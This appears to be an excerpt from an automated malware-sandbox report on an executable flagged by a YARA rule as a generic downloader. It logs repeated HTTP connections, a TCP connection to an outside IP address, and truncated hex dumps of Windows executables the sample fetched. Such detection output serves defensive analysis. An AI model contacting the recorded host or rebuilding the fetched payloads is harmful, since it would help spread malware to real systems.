Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49865

Yara detected Generic Downloader

Source: Yara match	File source: 15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.14811fbeb15.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.14811f449f0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1481a850000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.14811e96ca8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487fd4432f.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487fd1d525.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487fd68739.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2981594224.000001481A850000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: global traffic

TCP traffic: 192.168.2.4:49759 -> 91.215.85.66:15647

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 25 Apr 2024 10:16:06 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 25 Apr 2024 10:15:01 GMTETag: "45c00-616e90f67dd50"Accept-Ranges: bytesContent-Length: 285696Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 2f 34 e6 67 4e 5a b5 67 4e 5a b5 67 4e 5a b5 79 1c cf b5 76 4e 5a b5 79 1c d9 b5 01 4e 5a b5 79 1c de b5 4b 4e 5a b5 40 88 21 b5 62 4e 5a b5 67 4e 5b b5 0b 4e 5a b5 79 1c d0 b5 66 4e 5a b5 79 1c ce b5 66 4e 5a b5 79 1c cb b5 66 4e 5a b5 52 69 63 68 67 4e 5a b5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 43 d4 76 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 c4 00 00 00 14 82 02 00 00 00 00 70 17 00 00 00 10 00 00 00 e0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 90 82 02 00 04 00 00 ca a9 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec 5e 03 00 3c 00 00 00 00 a0 81 02 60 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 63 c2 00 00 00 10 00 00 00 c4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a0 87 02 00 00 e0 00 00 00 88 02 00 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 23 7e 02 00 70 03 00 00 2a 00 00 00 50 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 e0 00 00 00 a0 81 02 00 e2 00 00 00 7a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 25 Apr 2024 10:16:11 GMTContent-Type: application/x-msdos-programContent-Length: 1106998Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 25 Apr 2024 10:16:14 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 15 Mar 2024 11:59:56 GMTETag: "4a4030-613b1bf118700"Accept-Ranges: bytesContent-Length: 4866096Content-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 84 e1 90 58 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 c4 35 00 00 50 14 00 00 00 00 00 60 d5 35 00 00 10 00 00 00 e0 35 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 4a 00 00 04 00 00 60 c3 4a 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 37 00 9c 4e 00 00 00 d0 3c 00 eb fe 0d 00 00 00 00 00 00 00 00 00 00 18 4a 00 30 28 00 00 00 30 38 00 84 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 38 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 be 37 00 e0 0b 00 00 00 00 38 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 85 35 00 00 10 00 00 00 86 35 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 3c 3d 00 00 00 a0 35 00 00 3e 00 00 00 8a 35 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 b0 56 01 00 00 e0 35 00 00 58 01 00 00 c8 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 8c 6d 00 00 00 40 37 00 00 00 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9c 4e 00 00 00 b0 37 00 00 50 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 d2 09 00 00 00 00 38 00 00 0a 00 00 00 70 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 10 38 00 00 00 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 38 00 00 02 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 84 9a 04 00 00 30 38 00 00 9c 04 00 00 7c 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 eb fe 0d 00 00 d0 3c 00 00 00 0e 00 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 25 Apr 2024 10:16:17 GMTContent-Type: application/x-msdos-programContent-Length: 685392Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 